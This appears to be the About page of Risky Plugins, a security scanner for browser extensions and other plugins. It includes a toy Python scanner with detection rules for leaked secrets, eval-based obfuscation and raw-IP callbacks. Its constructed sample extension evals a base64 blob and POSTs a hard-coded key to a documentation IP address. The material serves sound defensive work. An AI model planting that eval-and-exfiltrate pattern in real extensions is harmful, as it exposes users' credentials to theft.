About Risky Plugins

A security search engine for the code people casually install.

Browser extensions, editor plugins, MCP servers, n8n nodes: they are tiny supply chain decisions made all day long. Risky Plugins makes those decisions less blind.

Why

The extension layer is a mess.

Most teams have a decent answer for packages, containers, and cloud assets. Extensions are different. They get installed by one person, become part of a workflow, then quietly keep updating from a marketplace you do not control.

That is risky even when everyone involved is acting in good faith. It gets worse when an extension changes owners, starts asking for broader permissions, ships obfuscated code, leaks a maintainer token, or pulls in a dependency nobody has looked at.

Risky Plugins exists to put a searchable security record next to those installs.

What we check

Not a magic verdict. A pile of useful signals.

The analyzer downloads extension artifacts from their marketplaces, unpacks them, scans the contents, compares each version against the ones seen before, and stores the findings so you can search, filter, and investigate.

01 Secrets left in packages
02 Known malware patterns
03 Dangerous permissions
04 Obfuscated or packed code
05 Risky network indicators
06 Vulnerable dependencies
07 Publisher and version changes
08 Supply-chain relationships
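To make the pipeline above concrete, here is a toy scanner written for this page. It is an added illustration, not Risky Plugins' own analyzer: it unpacks a zip-packaged browser extension, runs line-oriented rules for secrets, obfuscation and network indicators over each text file, flags risky manifest permissions, diffs the manifest against a previously seen version, and rolls everything into a score that stays traceable to file-and-line evidence. The rule set, the weights, the risky-permission list and the sample package (a v2 manifest that broadened permissions plus a background script with a hard-coded key, dynamic code and a raw-IP callback) are all constructed for the example.

```python
"""Toy extension-package scanner: an added illustration of the signals listed above,
not Risky Plugins' own analyzer. Rules, weights, the risky-permission list and the
sample package are constructed for this example."""
import base64
import io
import json
import re
import zipfile

# Chrome-style manifest permissions that deserve a human look (assumed list).
RISKY_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "cookies",
                     "debugger", "nativeMessaging", "tabs", "history", "clipboardRead"}

# (category, rule) -> pattern. Every hit records file, line and the matched text.
RULES = {
    ("secret", "aws_access_key"): re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    ("secret", "github_token"): re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    ("secret", "generic_token"): re.compile(
        r"(?i)(api[_-]?key|secret|token)\s*[:=]\s*['\"][A-Za-z0-9_\-]{20,}['\"]"),
    ("obfuscation", "dynamic_code"): re.compile(r"\b(eval|Function)\s*\("),
    ("obfuscation", "base64_blob"): re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
    ("obfuscation", "hex_escape_run"): re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
    ("network", "raw_ip_url"): re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    ("network", "plaintext_http"): re.compile(r"\bhttp://[^\s'\"]+"),
}
# Per-finding weights; the score is their sum, capped at 100 (assumed scheme).
WEIGHTS = {"secret": 40, "obfuscation": 20, "network": 10, "permission": 5, "drift": 15}
TEXT_SUFFIXES = (".js", ".json", ".html", ".ts", ".css", ".txt", ".env")


def scan_text(name, text):
    """Apply every regex rule to each line of one unpacked file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for (category, rule), pattern in RULES.items():
            match = pattern.search(line)
            if match:
                findings.append({"category": category, "rule": rule, "file": name,
                                 "line": lineno, "evidence": match.group(0)[:60]})
    return findings


def manifest_permissions(manifest):
    """Union of API permissions and host permissions declared in a manifest."""
    return set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))


def scan_package(zip_bytes, previous_manifest=None):
    """Unpack a zip-packaged extension, scan its text files, flag risky permissions,
    and report permissions added since previous_manifest. Returns (score, findings)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(TEXT_SUFFIXES):
                continue  # binaries and images get no line-oriented rules here
            text = archive.read(name).decode("utf-8", errors="replace")
            findings.extend(scan_text(name, text))
            if name == "manifest.json":
                manifest = json.loads(text)
                perms = manifest_permissions(manifest)
                for perm in sorted(perms & RISKY_PERMISSIONS):
                    findings.append({"category": "permission", "rule": "risky_permission",
                                     "file": name, "line": None, "evidence": perm})
                if previous_manifest is not None:
                    for perm in sorted(perms - manifest_permissions(previous_manifest)):
                        findings.append({"category": "drift", "rule": "permission_added",
                                         "file": name, "line": None,
                                         "evidence": f"{previous_manifest.get('version')} -> "
                                                     f"{manifest.get('version')}: +{perm}"})
    score = min(100, sum(WEIGHTS[f["category"]] for f in findings))
    return score, findings


# Constructed sample: the earlier version only needed storage and one host.
PREVIOUS_MANIFEST = {"name": "Tab Helper", "version": "1.4.2", "manifest_version": 3,
                     "permissions": ["storage"], "host_permissions": ["https://example.com/*"]}


def build_sample_package():
    """Constructed v2 package: broadened permissions, a hard-coded key (the AWS
    documentation example key), a base64 blob fed to eval, and a raw-IP callback."""
    manifest = {"name": "Tab Helper", "version": "2.0.0", "manifest_version": 3,
                "permissions": ["storage", "tabs", "cookies"], "host_permissions": ["<all_urls>"]}
    blob = base64.b64encode(b"\x90" * 70).decode()  # 96 chars, enough to trip base64_blob
    background = "\n".join([
        'const API_KEY = "AKIAIOSFODNN7EXAMPLE";  // AWS documentation example key',
        f'const payload = "{blob}";',
        "eval(atob(payload));",
        'fetch("http://203.0.113.10/collect", { method: "POST", body: API_KEY });',
    ])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("manifest.json", json.dumps(manifest))
        archive.writestr("background.js", background)
    return buf.getvalue()


if __name__ == "__main__":
    score, findings = scan_package(build_sample_package(), PREVIOUS_MANIFEST)
    print("score:", score)
    for f in findings:
        print(f"{f['category']:12} {f['rule']:18} {f['file']}:{f['line']}  {f['evidence']}")
```

The point of the structure is the last of the eight signals as much as the first: every entry in `findings` names the file, the line where one exists, and the matched text, so the score that comes out is a summary of evidence rather than a verdict. A real analyzer would add dependency-manifest parsing against a vulnerability feed, publisher-identity tracking across versions, and a quieter rule set, since a pattern like `plaintext_http` fires on plenty of legitimate code and is a signal for review, not proof of anything.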

Evidence beats vibes

Every score should be traceable back to findings: files, permissions, dependencies, metadata, and version history. A scary number without evidence is not useful.

Extensions are software

They read pages, touch tokens, run in editors, and sit inside workflows. Treating them like harmless UI add-ons is how teams inherit avoidable risk.

Automation needs humility

Scanners catch a lot. They also miss things and sometimes overreact. Risky Plugins is built to surface signals for review, not replace judgement.

What it is for

Fast answers before an extension becomes part of your environment.

For security teams

Build an allowlist, review risky installs, watch for newly suspicious updates, and plug extension risk into existing workflows through the API.

For developers

Check editor plugins, browser extensions, MCP servers, and automation nodes before they land in your day-to-day tools or CI/CD paths.

For researchers

Compare publishers, versions, permissions, malware hits, secrets, and dependency drift across ecosystems that are usually studied one marketplace at a time.

Beta note

This is live, but it is not pretending to be finished.

The scanners, search, scorecards, and API are usable today. We are still improving false positive handling, marketplace coverage, alerting, and enterprise workflows. If a finding looks wrong, tell us. If an extension looks dangerous, treat the score as the start of the investigation, not the end of it.